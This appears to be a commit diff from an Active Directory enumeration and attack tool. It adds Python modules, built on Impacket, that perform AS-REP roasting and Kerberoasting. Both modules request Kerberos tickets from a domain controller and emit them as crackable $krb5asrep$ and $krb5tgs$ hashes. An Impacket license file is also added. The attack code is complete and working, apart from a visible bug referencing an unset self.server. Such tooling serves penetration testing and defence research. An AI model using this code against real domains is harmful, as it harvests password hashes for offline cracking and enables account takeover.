CasperGN · CasperGN · Sep 21, 2020 · Sep 22, 2020 · Sep 22, 2020 · Sep 22, 2020
diff --git a/activeDirectoryEnum.py b/activeDirectoryEnum.py
diff --git a/ade/__init__.py b/ade/__init__.py
diff --git a/ade/__main__.py b/ade/__main__.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-import ade
+from ade import ade
 import sys
 
 ade.main(sys.argv)
diff --git a/ade/ade.py b/ade/ade.py
diff --git a/external/bloodhound/enumeration/__init__.py → ade/attacks/asreproast/__init__.py b/external/bloodhound/enumeration/__init__.py → ade/attacks/asreproast/__init__.py
diff --git a/ade/attacks/asreproast/asreproast.py b/ade/attacks/asreproast/asreproast.py
@@ -0,0 +1,76 @@
+from impacket.krb5 import constants
+from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, AS_REP, seq_set, seq_set_iter
+from impacket.krb5.kerberosv5 import sendReceive, KerberosError
+from impacket.krb5.types import KerberosTime, Principal
+from pyasn1.codec.der import decoder, encoder
+from pyasn1.type.univ import noValue
+from binascii import hexlify
+import datetime, random
+
+
+class AsRepRoast():
+
+
+    def __init__(self):
+        pass
+
+
+    def RepRoast(self, server: str, usr: list):
+
+        hashes = []
+        # Build request for Tickets
+        clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        asReq = AS_REQ()
+        domain = str(server).upper()
+        serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        pacReq = KERB_PA_PAC_REQUEST()
+        pacReq['include-pac'] = True
+        encodedPacReq = encoder.encode(pacReq)
+        asReq['pvno'] = 5
+        asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
+        asReq['padata'] = noValue
+        asReq['padata'][0] = noValue
+        asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
+        asReq['padata'][0]['padata-value'] = encodedPacReq
+
+        requestBody = seq_set(asReq, 'req-body')
+
+        options = list()
+        options.append(constants.KDCOptions.forwardable.value)
+        options.append(constants.KDCOptions.renewable.value)
+        options.append(constants.KDCOptions.proxiable.value)
+        requestBody['kdc-options'] = constants.encodeFlags(options)
+
+        seq_set(requestBody, 'sname', serverName.components_to_asn1)
+        seq_set(requestBody, 'cname', clientName.components_to_asn1)
+
+        requestBody['realm'] = domain
+
+        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
+        requestBody['till'] = KerberosTime.to_asn1(now)
+        requestBody['rtime'] = KerberosTime.to_asn1(now)
+        requestBody['nonce'] = random.getrandbits(31)
+
+        supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
+
+        seq_set_iter(requestBody, 'etype', supportedCiphers)
+
+        msg = encoder.encode(asReq)
+
+        try:
+            response = sendReceive(msg, domain, server)
+        except KerberosError as e:
+            if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
+                supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
+                seq_set_iter(requestBody, 'etype', supportedCiphers)
+                msg = encoder.encode(asReq)
+                response = sendReceive(msg, domain, self.server)
+            else:
+                print(e)
+                return None
+
+            asRep = decoder.decode(response, asn1Spec=AS_REP())[0]
+
+            hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode()))
+
+        return hashes
diff --git a/ade/attacks/kerberoast/__init__.py b/ade/attacks/kerberoast/__init__.py
diff --git a/ade/attacks/kerberoast/kerberoast.py b/ade/attacks/kerberoast/kerberoast.py
@@ -0,0 +1,59 @@
+from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, KerberosError
+from impacket.ntlm import compute_lmhash, compute_nthash
+from impacket.krb5.types import Principal
+from impacket.krb5.asn1 import TGS_REP
+from impacket.krb5 import constants
+from pyasn1.codec.der import decoder
+from binascii import hexlify
+from termcolor import colored
+
+
+class Kerberoast():
+
+
+    def __init__(self):
+        pass
+
+
+    def roast(self, domuser: str, passwd: str, userDomain: str, user: str, spn: str) -> dict:
+
+        user_tickets = {}
+        # Get TGT for the supplied user
+        client = Principal(domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        try:
+            # We need to take the domain from the user@domain since it *could* be a cross-domain user
+            tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(passwd), compute_nthash(passwd), None, kdcHost=None)
+
+            TGT = {}
+            TGT['KDC_REP'] = tgt
+            TGT['cipher'] = cipher
+            TGT['sessionKey'] = newSession
+
+            try:
+                # Get the TGS
+                serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+                tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey'])
+                # Decode the TGS
+                decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
+                # Get different encryption types
+                if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
+                    entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
+                    user_tickets[spn] = entry
+                elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
+                    entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode())
+                    user_tickets[spn] = entry
+                elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
+                    entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode())
+                    user_tickets[spn] = entry
+                elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
+                    entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
+                    user_tickets[spn] = entry
+
+            except KerberosError as err:
+                print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1]))
+                return None
+        except KerberosError as err:
+                print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1]))
+                return None
+
+        return user_tickets
diff --git a/ade/attacks/ticketer/LICENSE b/ade/attacks/ticketer/LICENSE
@@ -0,0 +1,84 @@
+Licencing
+---------
+
+We provide this software under a slightly modified version of the
+Apache Software License. The only changes to the document were the
+replacement of "Apache" with "Impacket" and "Apache Software Foundation"
+with "SecureAuth Corporation". Feel free to compare the resulting
+document to the official Apache license.
+
+The `Apache Software License' is an Open Source Initiative Approved
+License.
+
+
+The Apache Software License, Version 1.1
+Modifications by SecureAuth Corporation (see above)
+
+Copyright (c) 2000 The Apache Software Foundation.  All rights
+reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in
+   the documentation and/or other materials provided with the
+   distribution.
+
+3. The end-user documentation included with the redistribution,
+   if any, must include the following acknowledgment:
+      "This product includes software developed by
+       SecureAuth Corporation (https://www.secureauth.com/)."
+   Alternately, this acknowledgment may appear in the software itself,
+   if and wherever such third-party acknowledgments normally appear.
+
+4. The names "Impacket", "SecureAuth Corporation" must
+   not be used to endorse or promote products derived from this
+   software without prior written permission. For written
+   permission, please contact oss@secureauth.com.
+
+5. Products derived from this software may not be called "Impacket",
+   nor may "Impacket" appear in their name, without prior written
+   permission of SecureAuth Corporation.
+
+THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+
+
+Smb.py and nmb.py are based on Pysmb by Michael Teo
+(https://miketeo.net/projects/pysmb/), and are distributed under the
+following license:
+
+This software is provided 'as-is', without any express or implied
+warranty.  In no event will the author be held liable for any damages
+arising from the use of this software.
+
+Permission is granted to anyone to use this software for any purpose,
+including commercial applications, and to alter it and redistribute it
+freely, subject to the following restrictions:
+
+1. The origin of this software must not be misrepresented; you must
+   not claim that you wrote the original software. If you use this
+   software in a product, an acknowledgment in the product
+   documentation would be appreciated but is not required.
+
+2. Altered source versions must be plainly marked as such, and must
+   not be misrepresented as being the original software.
+
+3. This notice cannot be removed or altered from any source
+   distribution.
diff --git a/ade/attacks/ticketer/__init__.py b/ade/attacks/ticketer/__init__.py